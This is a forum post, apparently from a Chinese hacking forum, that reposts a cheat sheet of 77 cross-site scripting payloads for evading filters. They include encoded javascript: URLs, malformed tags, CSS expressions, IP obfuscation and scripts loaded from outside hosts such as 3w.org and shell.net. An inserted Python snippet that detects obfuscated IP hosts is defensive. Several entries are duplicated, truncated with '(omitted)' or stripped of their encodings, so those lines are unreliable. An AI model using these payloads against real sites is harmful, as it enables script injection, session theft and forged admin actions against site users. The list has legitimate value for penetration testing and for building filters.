There seems to be little XSS material on t00ls, so I copied over something good I came across; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..(omitted)..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..(omitted)..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..(omitted)..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL link
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can add the JS code to an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
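Added example, not part of the original post: a Python check for the IP forms in (70)-(73). It canonicalises decimal, hex, octal and single-integer hosts the way inet_aton()-style URL parsing does, strips the tab/newline characters browsers ignore, and reports every href whose host is a numeric IP not written as plain dotted-decimal. The function names and SAMPLE_HTML are my own constructions.

```python
import re

def _parse_part(part: str) -> "int | None":
    """One dotted component: 0x.. is hex, a leading 0 is octal, else decimal."""
    try:
        if part[:2].lower() == "0x":
            return int(part[2:], 16)
        if len(part) > 1 and part[0] == "0":
            return int(part, 8)
        return int(part, 10)
    except ValueError:
        return None

def canonical_ipv4(host: str) -> "str | None":
    """Dotted-quad form of a numeric host with 1 to 4 components, or None.
    As in inet_aton(), a short last component fills the remaining bits."""
    parts = [_parse_part(p) for p in host.split(".")]
    if not 1 <= len(parts) <= 4 or any(p is None or p < 0 for p in parts):
        return None
    value = 0
    for p in parts[:-1]:
        if p > 0xFF:
            return None
        value = (value << 8) | p
    tail_bits = 8 * (5 - len(parts))  # bits covered by the last component
    if parts[-1] >= 1 << tail_bits:
        return None
    value = (value << tail_bits) | parts[-1]
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))

_HREF = re.compile(r'href\s*=\s*"([^"]*)"', re.I)
_AUTHORITY = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//([^/?#]*)", re.I)

def obfuscated_hosts(html: str) -> list:
    """(host as written, canonical IP) for every href whose host is a numeric
    IP in any form other than plain dotted-decimal; named hosts are skipped."""
    found = []
    for value in _HREF.findall(html):
        url = re.sub(r"[\t\n\r]", "", value)  # browsers drop these anywhere in a URL
        m = _AUTHORITY.match(url)
        host = m.group(1).rsplit("@", 1)[-1].split(":")[0] if m else ""  # no userinfo/port
        canon = canonical_ipv4(host)
        if canon is not None and canon != host:
            found.append((host, canon))
    return found

SAMPLE_HTML = (  # constructed sample mirroring entries (68)-(73), not from a real page
    '<A HREF="http://127.0.0.1/">XSS</A> <A HREF="http://3232235521">XSS</A> '
    '<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A> <A HREF="http://0300.0250.0000.0001">XSS</A> '
    '<A HREF="h\ntt\tp://6\t6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A>'
)
```

On the sample, the three 192.168.0.1 spellings and the mixed-encoding host (which resolves to 66.102.7.147) are reported, while 127.0.0.1 and www.google.com are not.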
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14